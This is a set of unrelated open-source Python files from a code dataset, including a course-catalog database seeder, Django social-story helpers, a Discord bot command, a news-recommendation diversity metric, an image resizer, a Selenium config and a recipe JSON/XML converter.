',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 4710',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Information Systems Project Management',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Principles and techniques of information systems project management; '\n\t\t\t\t\t\t\t'qualitative and quantitative essentials to include project integration, scope, '\n\t\t\t\t\t\t\t'schedule, cost, quality, human resources, communications, and risk. Practical '\n\t\t\t\t\t\t\t'experience managing a project with complex technology issues.',\n\t\t\t\t\t\t\tprerequisites = 'Junior standing'))\n\ncourses.append(models.Course(course = 'CSC 4797',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Information Systems Capstone',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Student driven project on the application of an emerging technology '\n\t\t\t\t\t\t\t'that demonstrates learned project management, system design and communication '\n\t\t\t\t\t\t\t'skills. A cumulative experience to complete a student\'s portfolio of expertise '\n\t\t\t\t\t\t\t'in information systems.',\n\t\t\t\t\t\t\tprerequisites = 'Senior standing; Information Systems majors only'))\n\ncourses.append(models.Course(course = 'CSC 1035',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Databases for Many Majors',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'No background in computing necessary. Design and implementation of '\n\t\t\t\t\t\t\t'your own database as a group project. Cooperative learning techniques to demystify '\n\t\t\t\t\t\t\t'key concepts: the relational model, normalization, the Entity-Relationship model and SQL.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1990',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Enrichment Seminar in Computing',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'The catalog description of this course will be posted soon.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 4510',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Machine Learning',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'The nature of intelligence and the question of its computer '\n\t\t\t\t\t\t\t'implementation; the nature of learning and how it might be cast as an algorithm; '\n\t\t\t\t\t\t\t'the design of software systems that adapt to new circumstances in their environments.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1051'))\n\ncourses.append(models.Course(course = 'CSC 2400',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computing Systems I',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Architecture of computer systems: representation of data; processor, '\n\t\t\t\t\t\t\t'memory and I/O organization. Assembly language programming. C programming language '\n\t\t\t\t\t\t\t'constructs and their relationships to the underlying architecture. 
Basics of operating '\n\t\t\t\t\t\t\t'systems: interrupts, concurrency, process scheduling, security, networking.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052 and CSC 1300'))\n\ncourses.append(models.Course(course = 'CSC 2405',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computing Systems II',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Processes, threads and concurrent programming. Scheduling and Dispatching. '\n\t\t\t\t\t\t\t'Linking and Relocating. Memory management. Virtual memory. System level I/O device '\n\t\t\t\t\t\t\t'management. File systems. Security and protection in depth. Real time and embedded systems. '\n\t\t\t\t\t\t\t'System performance evaluation.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2400'))\n\ncourses.append(models.Course(course = 'CSC 8991',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Graduate Computing Practicum Continuation',\n\t\t\t\t\t\t\tcredits = 0,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'The catalog description of this course will be posted soon.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8990'))\n\ncourses.append(models.Course(course = 'CSC 1000',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'The Practice of Computing',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Anatomy of a computing system including tiny systems such as cell phones; '\n\t\t\t\t\t\t\t'resource management-memory, processes, file structure; network analysis-network topology, '\n\t\t\t\t\t\t\t'performance, privacy, security; application scripting-concepts and practices of programming.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8541',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Requirements Engineering',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Students will practice current techniques of requirements engineering. This '\n\t\t\t\t\t\t\t'class will focus on developing excellent oral and written technical communication skills. '\n\t\t\t\t\t\t\t'Topics may include: requirements elicitation and analysis; requirements specification; test '\n\t\t\t\t\t\t\t'driven development; system modeling; requirements validation; requirements management.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8540'))\n\ncourses.append(models.Course(course = 'CSC 8542',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Software Design and Evolution',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Students will be introduced to both \"high level\" and \"low level\" design '\n\t\t\t\t\t\t\t'concepts. High level design concepts include client/server and web architectures, mobile '\n\t\t\t\t\t\t\t'computing, the use of common frameworks (e.g. J2EE and .NET), and strategies for evolving '\n\t\t\t\t\t\t\t'software. Low level design concepts include analysis patterns, design patterns, and '\n\t\t\t\t\t\t\t'refactoring approaches. Students will receive a specification, and will design and evolve '\n\t\t\t\t\t\t\t'a solution. 
This class will continue to emphasize oral and written technical communication '\n\t\t\t\t\t\t\t'skills.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8541'))\n\ncourses.append(models.Course(course = 'CSC 3990',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computing Research Topics',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Centered around the development of a research project in one of several '\n\t\t\t\t\t\t\t'selected computing topics. Experimentation, data collection, literature review. Standard '\n\t\t\t\t\t\t\t'for written presentation of information. Reports of progress required of all students.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2053'))\n\ncourses.append(models.Course(course = 'CSC 8491',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Data Mining and Database Programming',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'The catalog description of this course will be posted soon.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 2020',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Web Development & Technologies I',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Design of web content, utilization of web tools, configuration of supporting '\n\t\t\t\t\t\t\t'technologies. Emphasis on client-side services: HTML, style sheets, JavaScript, Document '\n\t\t\t\t\t\t\t'Object Model, DHTML.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 2025',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Web Development & Technologies II',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Design of web content, configuration of supporting web technologies. '\n\t\t\t\t\t\t\t'Emphasis on server-side services: databases and forms, CGI, Perl, PHP, XML, AJAX, cookies '\n\t\t\t\t\t\t\t'and session management, security issues.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1045',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Algorithms, Cartoons, and Animation',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Computer-assisted animation & its programming dialects; cartoon creation '\n\t\t\t\t\t\t\t'from story-boarding to product delivery; algorithms - efficiency, correctness, '\n\t\t\t\t\t\t\t'understanding via animation.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'MSE 2000',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Evolution and Learning in Computational and Robotic Agents',\n\t\t\t\t\t\t\tcredits = 4,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Ever wonder how iTunes\' Genius option figures out what music or movies '\n\t\t\t\t\t\t\t'you might like based on your purchase history? Can home-based medical-care robots learn '\n\t\t\t\t\t\t\t'how to respond to their human patients\' emotional patterns? This course explores how '\n\t\t\t\t\t\t\t'software designers and artificial intelligence researchers draw inspiration from biology '\n\t\t\t\t\t\t\t'and learning theory to design programs and robotic agents that learn and adapt to changes '\n\t\t\t\t\t\t\t'in their environment. 
No prior programming experience is required.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\n\n\n\nfor i in courses:\n db.session.add(i)\n\ndb.session.commit()","repo_name":"danieljoyce34/Computer-Science-Dept-Website","sub_path":"populateCourses.py","file_name":"populateCourses.py","file_ext":"py","file_size_in_byte":49793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23329470230","text":"from story.models import StoryPost, StoryLikes\nfrom account.models import Account, Follows\n\nimport datetime\nimport cv2\nimport os\nfrom math import floor\n\n\ndef is_image_aspect_ratio_valid(img_url):\n img = cv2.imread(img_url)\n dimensions = tuple(img.shape[1::-1]) # gives: (width, height)\n # print(\"dimensions: \" + str(dimensions))\n aspect_ratio = dimensions[0] / dimensions[1] # divide w / h\n # print(\"aspect_ratio: \" + str(aspect_ratio))\n if aspect_ratio < 1:\n return False\n return True\n\n\ndef is_image_size_valid(img_url, mb_limit):\n image_size = os.path.getsize(img_url)\n # print(\"image size: \" + str(image_size))\n if image_size > mb_limit:\n return False\n return True\n\n\ndef liked_post(user, story_post):\n return StoryLikes.objects.filter(author=Account.objects.filter(email=user.email).first(),\n post=StoryPost.objects.filter(pk=story_post.pk).first()).exists()\n\n\ndef unlike_post(user, story_post):\n like = StoryLikes.objects.get(author=Account.objects.filter(email=user.email).first(),\n post=StoryPost.objects.filter(pk=story_post.pk).first())\n like.delete()\n return False\n\n\ndef like_post(user, story_post):\n like = StoryLikes(author=Account.objects.filter(email=user.email).first(),\n post=StoryPost.objects.filter(pk=story_post.pk).first())\n like.save()\n return True\n\n\ndef does_user_follow_profile(user, profile_username):\n return Follows.objects.filter(follower_id=Account.objects.get(email=user.email),\n following_id=Account.objects.get(username__iexact=profile_username)).exists()\n\n\ndef unfollow_profile(user, profile):\n follows = Follows.objects.get(follower_id=Account.objects.get(email=user.email),\n following_id=Account.objects.get(username__iexact=profile.username))\n follows.delete()\n return False\n\n\ndef follow_profile(user, profile):\n follows = Follows(follower_id=Account.objects.get(email=user.email).pk,\n following_id=Account.objects.get(username__iexact=profile.username).pk)\n follows.save()\n return True\n\ndef get_time_ago(story_date):\n\n SECOND_MILLIS = 1000\n MINUTE_MILLIS = 60 * SECOND_MILLIS\n HOUR_MILLIS = 60 * MINUTE_MILLIS\n DAY_MILLIS = 24 * HOUR_MILLIS\n\n time = story_date.timestamp() * 1000\n now = datetime.datetime.now().timestamp() * 1000\n\n if time > now or time <= 0:\n return story_date\n\n diff = now - time\n\n if diff < MINUTE_MILLIS:\n return \"just now\"\n\n elif diff < 2 * MINUTE_MILLIS:\n return \"a minute ago\"\n elif diff < 50 * MINUTE_MILLIS:\n return str(floor(diff / MINUTE_MILLIS)) + \" minutes ago\"\n elif diff < 90 * MINUTE_MILLIS:\n return \"an hour ago\"\n elif diff < 24 * HOUR_MILLIS:\n return str(floor(diff / HOUR_MILLIS)) + \"h ago\"\n elif diff < 48 * HOUR_MILLIS:\n return \"yesterday\"\n elif diff < 30 * DAY_MILLIS:\n return str(floor(diff / DAY_MILLIS)) + \" days ago\"\n else:\n return story_date\n\n\ndef get_tags(caption):\n if \"#\" in caption:\n out_str = \"\"\n found_word = False\n\n for c in caption:\n if c == '#':\n found_word = True\n out_str += c\n else:\n if found_word:\n out_str += c\n\n if c == ' ':\n found_word = False\n\n out_str = 
out_str.replace(\" \", \"\").replace(\"#\", \",#\")\n return out_str[1:]\n\n return \"\"\n","repo_name":"sentrionic/Harmony-Django","sub_path":"story/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70925303844","text":"import nextcord\nfrom nextcord import Interaction\nfrom nextcord.ext import commands, ipc\nfrom discord_bot import DiscordBot#, client\n\nroles_list = ['Преподаватель', 'Модератор']\n\nclass TrackMessage(commands.Cog):\n server_id = None\n\n def __init__(self, client):\n self.client = client\n self.server_id = client.server_id\n\n @nextcord.slash_command(name=\"track_message\", description=\"track_message\", guild_ids=[server_id])\n @commands.has_permissions(administrator=True)\n async def self(self, interaction: Interaction, message_id: str, roles: str):\n check = False\n for member_role in interaction.user.roles:\n for _role in roles_list:\n if member_role.name == _role:\n check = True\n\n if not check:\n await interaction.response.send_message(f\"You don't have permissions\", ephemeral=True, delete_after=3.0)\n return\n\n DiscordBot.track_message(self.client, message_id, roles)\n await interaction.response.send_message(f\"You track message {message_id} with roles: {roles}\", ephemeral=True,\n delete_after=3.0)\n return\n\ndef setup(client):\n client.add_cog(TrackMessage(client))\n","repo_name":"moevm/bsc_ryzhih","sub_path":"discord_bot/cogs/track_message.py","file_name":"track_message.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37939454629","text":"from collections import Counter\nfrom dart.external.discount import harmonic_number\nfrom dart.external.kl_divergence import compute_kl_divergence\nimport numpy as np\n\n\nclass AlternativeVoices:\n \"\"\"\n Class that calculates the number of mentions of minority vs majority people. In the current implementation, what\n entails a minority / majority is hardcoded. In this case, for the implementation for a German media company,\n we calculate both minority/majority of gender and ethnicity. 
In both cases, we only consider United States citizens.\n    The required information is obtained by running Named Entity Recognition on a text and retrieving additional\n    information about the identified persons from Wikidata.\n    Gender:\n        majority: male\n        minority: non-male\n    Ethnicity:\n        majority: people with a 'United States' ethnicity or place of birth\n        minority: other\n    Actual calculation is done following the formula specified in Equation 8 from http://proceedings.mlr.press/v81/burke18a.html\n    We recognize there are a multitude of problems with this approach, and welcome suggestions for better ones.\n    \"\"\"\n\n    def __init__(self):\n        self.ethnicity_scores = {}\n        self.gender_scores = {}\n        self.mainstream_scores = {}\n\n        self.minorities = Counter()\n        self.majorities = Counter()\n        self.irrelevants = Counter()\n\n    def get_ethnicity_score(self, indx, article):\n        # scores are cached per article row index (indx) so repeated lookups are cheap\n        article_majority = 0\n        article_minority = 0\n        if indx in self.ethnicity_scores:\n            article_majority = self.ethnicity_scores[indx]['majority']\n            article_minority = self.ethnicity_scores[indx]['minority']\n        else:\n            persons = filter(lambda x: x['label'] == 'PERSON', article.entities)\n            for person in persons:\n                if 'citizen' in person and \"United States\" in person['citizen']:\n                    if 'ethnicity' in person:\n                        if 'white people' in person['ethnicity'] or person['ethnicity'] == []:\n                            article_majority += len(person['spans'])\n                        else:\n                            article_minority += len(person['spans'])\n                    else:\n                        if 'place_of_birth' in person:\n                            if 'United States' in person['place_of_birth']:\n                                article_majority += len(person['spans'])\n                            else:\n                                article_minority += len(person['spans'])\n            self.ethnicity_scores[indx] = {'majority': article_majority, 'minority': article_minority}\n        return article_majority, article_minority\n\n    def get_gender_score(self, indx, article):\n        # cached per article row index (indx), mirroring get_ethnicity_score\n        article_minority = 0\n        article_majority = 0\n        if indx in self.gender_scores:\n            article_majority = self.gender_scores[indx]['majority']\n            article_minority = self.gender_scores[indx]['minority']\n        else:\n            persons = filter(lambda x: x['label'] == 'PERSON', article.entities)\n            for person in persons:\n                if 'citizen' in person and \"United States\" in person['citizen']:\n                    if 'gender' in person:\n                        if 'male' in person['gender']:\n                            article_majority += len(person['spans'])\n                        else:\n                            article_minority += len(person['spans'])\n            self.gender_scores[indx] = {'majority': article_majority, 'minority': article_minority}\n        return article_majority, article_minority\n\n    def get_mainstream_score(self, indx, article):\n        article_minority = 0\n        article_majority = 0\n        if indx in self.mainstream_scores:\n            article_majority = self.mainstream_scores[indx]['majority']\n            article_minority = self.mainstream_scores[indx]['minority']\n        else:\n            try:\n                persons = filter(lambda x: x['label'] == 'PERSON', article.entities)\n            except TypeError:\n                print(article.entities)\n                persons = []\n            for person in persons:\n                if 'givenname' in person:\n                    article_majority += len(person['spans'])\n                else:\n                    try:\n                        article_minority += len(person['spans'])\n                    except KeyError:\n                        print(\"huh?\")\n            self.mainstream_scores[indx] = {'majority': article_majority, 'minority': article_minority}\n        return article_majority, article_minority\n\n    def get_dist(self, articles, value, adjusted=False):\n        n = len(articles)\n        count = 0\n        sum_one_over_ranks = harmonic_number(n)\n        distr = {0: 0, 1: 0}\n        majority = 0\n        minority = 0\n        for indx, article in articles.iterrows():\n            rank = count + 1\n            if value == 'gender':\n                
article_majority, article_minority = self.get_gender_score(indx, article)\n elif value == 'ethnicity':\n article_majority, article_minority = self.get_ethnicity_score(indx, article)\n elif value == 'mainstream':\n article_majority, article_minority = self.get_mainstream_score(indx, article)\n\n if article_minority > 0 and article_majority > 0:\n if adjusted:\n prob_majority = article_majority / (article_majority+article_minority) * 1/rank/sum_one_over_ranks\n prob_minority = article_minority / (article_majority+article_minority) * 1/rank/sum_one_over_ranks\n else:\n prob_majority = article_majority / (article_majority+article_minority)\n prob_minority = article_minority / (article_majority+article_minority)\n majority += prob_majority\n minority += prob_minority\n count += 1\n r = minority + majority\n if r > 0:\n distr[0] = minority / r\n distr[1] = majority / r\n return distr\n\n def calculate(self, full_pool, full_recommendation):\n pool = full_pool.loc[full_pool['category'] == 'news']\n recommendation = full_recommendation.loc[full_recommendation['category'] == 'news']\n\n if not recommendation.empty and not pool.empty:\n # pool_ethnicity = self.get_dist(pool, 'ethnicity', False)\n # recommendation_ethnicity = self.get_dist(recommendation, 'ethnicity', True)\n # ethnicity_inclusion = np.nan\n # if recommendation_ethnicity != {0: 0, 1: 0}:\n # ethnicity_inclusion = compute_kl_divergence(pool_ethnicity, recommendation_ethnicity)\n #\n # pool_gender = self.get_dist(pool, 'gender', False)\n # recommendation_gender = self.get_dist(recommendation, 'gender', True)\n # gender_inclusion = np.nan\n # if recommendation_gender != {0: 0, 1: 0}:\n # gender_inclusion = compute_kl_divergence(pool_gender, recommendation_gender)\n\n pool_mainstream = self.get_dist(pool, 'mainstream', False)\n recommendation_mainstream = self.get_dist(recommendation, 'mainstream', True)\n divergence_with_discount = np.nan\n if recommendation_mainstream != {0: 0, 1: 0}:\n divergence_with_discount = compute_kl_divergence(pool_mainstream, recommendation_mainstream)\n\n recommendation_mainstream = self.get_dist(recommendation, 'mainstream', False)\n divergence_without_discount = np.nan\n if recommendation_mainstream != {0: 0, 1: 0}:\n divergence_without_discount = compute_kl_divergence(pool_mainstream, recommendation_mainstream)\n\n return [divergence_with_discount, divergence_without_discount] # ethnicity_inclusion, gender_inclusion, mainstream_inclusion\n else:\n return\n","repo_name":"svrijenhoek/RADio","sub_path":"dart/metrics/alternative_voices.py","file_name":"alternative_voices.py","file_ext":"py","file_size_in_byte":7977,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"37722594897","text":"from PIL import Image\nimport os\ndir = 'D:/Projects/Code/Python3/Image-autoadjust/QDU-ClassAssistant/PHOTO/'\nif os.path.exists(dir):\n dies = os.listdir(dir)\n for diec in dies:\n print(diec)\n im = Image.open(dir+diec)\n out = im.resize((538,441),Image.ANTIALIAS) #resize image with high-quality\n out.save(dir+diec)\n","repo_name":"iceshadows/CLASS-Assistant","sub_path":"imagesizeadjust.py","file_name":"imagesizeadjust.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26294616874","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\nDEBUG = False\nLOG = True\nSKILLS_CS = ['Deep Learning', 'Convolutional Neural Networks', 
'TensorFlow', 'Machine Learning', 'Algorithms',\n 'Computer Vision', 'Deep Reinforcement Learning', 'Computer Science', 'Python', 'Matlab',\n 'Recurrent Neural Networks', 'Django', 'Java', 'Keras', 'PyTorch', 'Neural Networks', 'Edge Computing',\n 'OpenCV', 'Scikit-Learn', 'Natural Language Processing', 'Object Detection', 'Reinforcement Learning',\n 'Generative Adversarial Networks']\n\nSKILLS_GM = ['Unity Game Engine', 'Unreal Game Engine', 'Maya', 'Game Mechanics', 'Game Dynamics', 'Aesthetics',\n 'Gamification', 'Level design', 'Loot boxes', 'Intrinsic motivation', 'Oculus', 'Ray Tracing',\n 'Game Narrative', 'Haptic Technology', 'Role Playing Games', 'DLCs']\n\nSKILLS = SKILLS_CS\n\n# Elmo model location for tensorflow hub to load and execute.\nELMO_PATH = \"../word_representation_model/elmo\"\n\n# Bert Rare Word Threshold.\nrare_word_threshold = 2700\n\n# Selenium Config\nHEADLESS = True\nDRIVER_PATH = r\"D:\\Downloads\\chromedriver_win32\\chromedriver.exe\"\noptions = Options()\noptions.headless = HEADLESS\noptions.add_argument(\"--window-size=1920,1200\")\nDRIVER = webdriver.Chrome(executable_path=DRIVER_PATH, options=options)\n\n# Skills summaries extracted information saved file.\nSKILL_INFO_PATH = \"../data/skills_elmo.csv\"\n\n# Rare word skills with embeddings.\nWITH_ELMO = False\nif WITH_ELMO:\n SKILL_WORD_PATH = '../data/skill_words.pkl'\nelse:\n SKILL_WORD_PATH = '../data/skill_words_without_elmo.pkl'\n\n# Test url if needed\nTEST_URL = \"https://www.geeksforgeeks.org/binary-tree-set-1-introduction/\"\n\n# Meta is used to factor the number of skills given by the user.\n# This is used to balance the score based on the number of skill keywords extracted.\nMETA_PATH = \"../data/meta.npy\"\n","repo_name":"sid7vasa/DigitalDetoxAssistant","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"4877477097","text":"from abc import ABC, abstractmethod\nimport json\n\n\ndef parse_bool(value):\n if value == \"true\" or value == \"on\":\n return True\n elif value == \"false\" or value == \"off\":\n return False\n raise ValueError\n\n\nclass FormatController:\n def __init__(self, converter_type):\n self.converter = None\n self.set_converter_type(converter_type)\n\n def set_converter_type(self, converter_type):\n if converter_type == \"json\":\n self.converter = JsonFormatConverter()\n elif converter_type == \"xml\":\n self.converter = XmlFormatConverter()\n else:\n raise ValueError\n\n\nclass AbstractFormatConverter(ABC):\n @abstractmethod\n def convert_recipe_list(self, recipes):\n pass\n\n @abstractmethod\n def convert_full_recipe(self, recipes):\n pass\n\n @abstractmethod\n def convert_food_type_list(self, food_types, for_recipes):\n pass\n\n @abstractmethod\n def convert_recipe_ingredients(self, recipe_ingredients):\n pass\n\n @abstractmethod\n def convert_ingredient_list(self, ingredients):\n pass\n\n @abstractmethod\n def convert_preparation_step_list(self, step):\n pass\n\n\nclass JsonFormatConverter(AbstractFormatConverter):\n def convert_recipe_list(self, recipes):\n rep = list(\n map(lambda re: {\"recipe_id\": re.recipe_id, \"name\": re.name, \"image\": re.image, \"rating\": re.get_rating()},\n recipes))\n return json.dumps(rep, ensure_ascii=False)\n\n def convert_full_recipe(self, recipe):\n if recipe.is_author_anonymous:\n author = \"anonymous\"\n else:\n author = recipe.author.nickname\n return json.dumps({\n \"recipe_id\": 
recipe.recipe_id,\n            \"name\": recipe.name,\n            \"author\": author,\n            \"image\": recipe.image,\n            \"preparation_in_minutes\": recipe.preparation_in_minutes,\n            \"servings\": recipe.servings,\n            \"difficulty\": recipe.difficulty.title,\n            \"is_vegetarian\": recipe.is_vegetarian,\n            \"is_vegan\": recipe.is_vegan,\n            \"is_lactose_free\": recipe.is_lactose_free,\n            \"is_gluten_free\": recipe.is_gluten_free,\n            \"rating\": recipe.get_rating(),\n            \"ingredients\": self.convert_recipe_ingredients(recipe.ingredients),\n            \"preparation_steps\": self.convert_preparation_step_list(recipe.steps),\n            \"food_types\": self.convert_food_type_list(recipe.food_types, True)\n        }, ensure_ascii=False)\n\n    def convert_food_type_list(self, food_types, for_recipes):\n        result = list(map(lambda ft: {\"name\": ft.name}, food_types))\n        if for_recipes:\n            return result\n        return json.dumps(result, ensure_ascii=False)\n\n    def convert_recipe_ingredients(self, ingredients):\n        return list(map(lambda ing: {\"name\": ing.ingredient.name, \"value\": ing.value, \"unit\": ing.unit}, ingredients))\n\n    def convert_preparation_step_list(self, steps):\n        return list(map(lambda st: {\"number\": st.number, \"text\": st.text}, steps))\n\n    def convert_ingredient_list(self, ingredients):\n        return json.dumps(list(map(lambda ing: {\"name\": ing.name}, ingredients)), ensure_ascii=False)\n\n\nclass XmlFormatConverter(AbstractFormatConverter):\n    # Builds XML by string concatenation; tag names mirror the JSON converter's field names.\n    def convert_recipe_list(self, recipes):\n        xml_output = \"<recipes>\"\n        for recipe in recipes:\n            xml_output += f\"<recipe id='{recipe.recipe_id}'>\"\n            xml_output += f\"<name>{recipe.name}</name>\"\n            xml_output += f\"<image>{recipe.image}</image>\"\n            xml_output += f\"<rating>{recipe.get_rating()}</rating>\"\n            xml_output += \"</recipe>\"\n        xml_output += \"</recipes>\"\n        return xml_output\n\n    def convert_full_recipe(self, recipe):\n        if recipe.is_author_anonymous:\n            author = \"anonymous\"\n        else:\n            author = recipe.author.nickname\n\n        xml_output = f\"<recipe id='{recipe.recipe_id}'>\"\n        xml_output += f\"<name>{recipe.name}</name>\"\n        xml_output += f\"<author>{author}</author>\"\n        xml_output += f\"<image>{recipe.image}</image>\"\n        xml_output += f\"<preparation_in_minutes>{recipe.preparation_in_minutes}</preparation_in_minutes>\"\n        xml_output += f\"<servings>{recipe.servings}</servings>\"\n        xml_output += f\"<difficulty>{recipe.difficulty.title}</difficulty>\"\n        xml_output += f\"<is_vegetarian>{recipe.is_vegetarian}</is_vegetarian>\"\n        xml_output += f\"<is_vegan>{recipe.is_vegan}</is_vegan>\"\n        xml_output += f\"<is_lactose_free>{recipe.is_lactose_free}</is_lactose_free>\"\n        xml_output += f\"<is_gluten_free>{recipe.is_gluten_free}</is_gluten_free>\"\n        xml_output += f\"<rating>{recipe.get_rating()}</rating>\"\n        xml_output += self.convert_recipe_ingredients(recipe.ingredients)\n        xml_output += self.convert_preparation_step_list(recipe.steps)\n        xml_output += self.convert_food_type_list(recipe.food_types, True)\n        xml_output += f\"</recipe>\"\n\n        return xml_output\n\n    def convert_food_type_list(self, food_types, for_recipes):\n        xml_output = \"<food_types>\"\n        for ft in food_types:\n            xml_output += f\"<food_type>\"\n            xml_output += f\"<name>{ft.name}</name>\"\n            xml_output += f\"</food_type>\"\n        xml_output += \"</food_types>\"\n        return xml_output\n\n    def convert_recipe_ingredients(self, ingredients):\n        xml_output = \"<ingredients>\"\n        for ing in ingredients:\n            xml_output += f\"<ingredient>\"\n            xml_output += f\"<name>{ing.ingredient.name}</name>\"\n            xml_output += f\"<value>{ing.value}</value>\"\n            xml_output += f\"<unit>{ing.unit}</unit>\"\n            xml_output += f\"</ingredient>\"\n        xml_output += \"</ingredients>\"\n        return xml_output\n\n    def convert_preparation_step_list(self, steps):\n        xml_output = \"<preparation_steps>\"\n        for st in steps:\n            xml_output += f\"<step>\"\n            xml_output += f\"<number>{st.number}</number>\"\n            xml_output += f\"<text>{st.text}</text>\"\n            xml_output += f\"</step>\"\n        xml_output += \"</preparation_steps>\"\n        return xml_output\n\n    def convert_ingredient_list(self, ingredients):\n        xml_output = \"<ingredients>\"\n        for ing in ingredients:\n            xml_output += f\"<ingredient>\"\n            xml_output += f\"<name>{ing.name}</name>\"\n            xml_output += f\"</ingredient>\"\n        xml_output += \"</ingredients>\"\n        return 
